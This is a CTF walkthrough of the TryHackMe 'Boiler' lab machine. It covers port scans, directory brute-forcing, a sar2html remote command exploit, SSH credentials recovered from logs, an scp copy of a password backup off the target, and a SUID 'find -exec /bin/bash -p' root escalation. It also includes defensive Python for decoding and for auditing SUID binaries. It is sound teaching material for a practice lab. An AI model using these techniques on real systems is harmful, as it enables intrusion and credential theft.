Boiler CTF — TryHackMe — Writeup

5 min read · Nov 18, 2020


Hello. I’m Rahmos. Here is my Boiler CTF — TryHackMe — Writeup. Check it out!

First, deploy the machine and nmap for opened ports:

nmap -sV -p- -v -T4 <ip>


There are 4 open ports: 21 (FTP), 80 (Apache), 10000 (Webmin), 55007 (SSH).


Unfortunately, Webmin is at version 1.9.30, the newest version at the time of writing, so I cannot exploit this.

First, log in to FTP as anonymous and browse around for files:


There is a .txt file.

Read content of this file:

get .info.txt -

**Remember to add the “-” at the end so that the file is printed directly to your terminal instead of being transferred to your machine.


It’s encoded with ROT13. Let’s decode it:

ROT13 decode

Well, still nothing valuable 😣 So I guess that’s everything there is on FTP.

As port 80 (HTTP) is open, let’s visit the website.


It’s the default Apache page. I’ve checked the page source (Ctrl+U), but found nothing valuable. So let’s move on to finding hidden directories with gobuster:

gobuster dir -u <ip>:80 -w /path-to-wordlist


robots.txt exists, so let’s read it:


You’ll see a string of decimal numbers. Decode it from decimal and then from Base64; I will use

Feed the decoded string to hashid:


Look up the MD5 hash. I’ll use this link:

I’ve got the string: kidding. So far I don’t know what it is used for, so I’ll just leave it there.
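The decoding chain used so far (ROT13 on the FTP note, then decimal → Base64 → hash identification → dictionary lookup on the robots.txt string), as an added Python example that is not part of the original writeup. The robots.txt-style sample is constructed here from the page’s decoded word kidding, and the wordlist is a constructed stand-in for the online lookup service; the point it makes is that an unsalted MD5 of a dictionary word offers no protection.

```python
import base64
import codecs
import hashlib
import re


def rot13(text):
    """Undo the ROT13 applied to the FTP note (ROT13 is its own inverse)."""
    return codecs.decode(text, "rot_13")


def decimal_to_text(numbers):
    """Turn a whitespace-separated list of decimal byte values into text."""
    return "".join(chr(int(n)) for n in numbers.split())


def base64_to_text(data):
    """Base64-decode, tolerating stripped '=' padding."""
    padded = data + "=" * (-len(data) % 4)
    return base64.b64decode(padded).decode()


def identify_hash(candidate):
    """Minimal hashid-style guess based on hex length alone."""
    s = candidate.strip().lower()
    if re.fullmatch(r"[0-9a-f]{32}", s):
        return "MD5"
    if re.fullmatch(r"[0-9a-f]{40}", s):
        return "SHA-1"
    if re.fullmatch(r"[0-9a-f]{64}", s):
        return "SHA-256"
    return "unknown"


def lookup_md5(digest, wordlist):
    """An unsalted MD5 of a common word is recovered by hashing a wordlist."""
    target = digest.strip().lower()
    for word in wordlist:
        if hashlib.md5(word.encode()).hexdigest() == target:
            return word
    return None


def decode_robots_chain(decimal_string, wordlist):
    """decimal -> Base64 -> hash string -> (type guess, digest, matched word)."""
    digest = base64_to_text(decimal_to_text(decimal_string))
    return identify_hash(digest), digest, lookup_md5(digest, wordlist)


# Constructed sample: rebuild the robots.txt-style encoding from the page's word.
SAMPLE_WORD = "kidding"
SAMPLE_DIGEST = hashlib.md5(SAMPLE_WORD.encode()).hexdigest()
SAMPLE_ROBOTS = " ".join(
    str(ord(c)) for c in base64.b64encode(SAMPLE_DIGEST.encode()).decode()
)
SAMPLE_WORDLIST = ["password", "123456", "kidding", "letmein"]  # constructed stand-in

if __name__ == "__main__":
    print(rot13("Uryyb"))  # constructed ROT13 sample
    print(decode_robots_chain(SAMPLE_ROBOTS, SAMPLE_WORDLIST))
```

Running the script prints the ROT13 sample decoded and a tuple of the hash type guess, the recovered digest and the dictionary word it maps to.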

Next, access /joomla


So now I know that the website is using the Joomla CMS.

Joomla! CMS

Again, scan for hidden directories, but this time start from /joomla:

gobuster dir -u http://<ip>:80/joomla -w /path-to-wordlist

gobuster /joomla

Let’s access /_files


Decode it:


Well, nothing valuable again…

Next, /~www



Next, /_archive:


Still nothing.

Next, /_database




“Time command spring”. No meaning!

Next, /_test


There’s something about sar2html. A quick Google search for it turned up:


Not only the definition, but also a remote code execution exploit:

RCE exploit

So, let’s try a basic command first:


ls -al

Oh, it works!! There is a log.txt file. Let’s read its content by changing the command to cat log.txt:

cat log.txt

Now I’ve got the credentials for SSH:

basterd : superduperp@$$

So what next? Let’s log in over SSH with the credentials above!

ssh -p 55007 basterd@<ip>

** The -p flag sets the SSH port to 55007. Without it, SSH uses the default port, 22.


Now I’m into the machine!

Let’s spawn a bash shell for stability using Python:

python -c 'import pty; pty.spawn("/bin/bash")'

bash shell

List the files inside:

ls -al

So the other user’s password is stored in the file backup. Let’s read its content:

**Note: You can read it directly with cat, or copy it to your machine with scp and read it there.
If you choose scp, run this from the target shell, giving backup as the source file:

scp backup your-user-name@<your-VPN-ip>:/home/your-user-name/

Now I know another credential:

stoner : superduperp@$$no1knows

Let’s SSH as stoner:

ssh -p 55007 stoner@<ip>

stoner ssh

Now I’m stoner. Look around and read the files:


The content of .secret will be your user.txt flag!

Next, I’ll find a way to own root and get the final flag.

First, I use find to search for files with the SUID bit set:

find / -perm -u=s 2>/dev/null

Well, find itself has the SUID bit set, so I’ll use find for privilege escalation too!

find . -exec /bin/bash -p \; -quit

find can also execute other commands, so here I use it to run /bin/bash and spawn a shell. The -p flag stops bash from dropping the effective UID it inherited from the SUID find; because find is SUID root, bash spawns a shell as root!
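From the defender’s side, the root cause exploited above is a SUID-root bit on a binary that can run arbitrary commands (find with -exec). As an added example that is not part of the original writeup, this Python audit lists SUID-root binaries and flags any that are not on a known-good baseline; the baseline here is a constructed assumption for a stock Ubuntu host and must be tuned to the image actually deployed.

```python
import os
import stat

# Constructed baseline (assumption): SUID-root binaries normally present on a
# stock Ubuntu host. Tune this to a known-good image; anything outside it,
# such as /usr/bin/find on this box, deserves a second look.
EXPECTED_SUID = {
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/su", "/usr/bin/chsh",
    "/usr/bin/chfn", "/usr/bin/gpasswd", "/usr/bin/newgrp", "/usr/bin/mount",
    "/usr/bin/umount", "/bin/su", "/bin/mount", "/bin/umount", "/bin/ping",
}

# Pseudo-filesystems that should not be walked.
SKIP_ROOTS = ("/proc", "/sys", "/dev", "/run")


def is_suid_root(mode, uid):
    """True for a regular file owned by root (uid 0) with the setuid bit set."""
    return stat.S_ISREG(mode) and bool(mode & stat.S_ISUID) and uid == 0


def unexpected_suid(entries, allowlist=EXPECTED_SUID):
    """entries: iterable of (path, st_mode, st_uid).

    Return the sorted paths that are SUID-root but absent from the baseline.
    """
    return sorted(
        path for path, mode, uid in entries
        if is_suid_root(mode, uid) and path not in allowlist
    )


def _skip(dirpath):
    return any(dirpath == r or dirpath.startswith(r + "/") for r in SKIP_ROOTS)


def walk_filesystem(root="/"):
    """Yield (path, mode, uid) for every file under root, skipping pseudo-fs."""
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda e: None):
        if _skip(dirpath):
            dirnames[:] = []  # do not descend into /proc, /sys, ...
            continue
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: do not follow symlinks
            except OSError:
                continue
            yield path, st.st_mode, st.st_uid


if __name__ == "__main__":
    for path in unexpected_suid(walk_filesystem()):
        print("unexpected SUID-root binary:", path)
```

Run as a periodic check (or as a build-time test of a golden image), any line of output is a candidate misconfiguration to investigate; the fix for the case in this writeup is simply chmod u-s on the offending binary, since find never needs root privileges to do its job.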

Get the final flag: root.txt


The end.




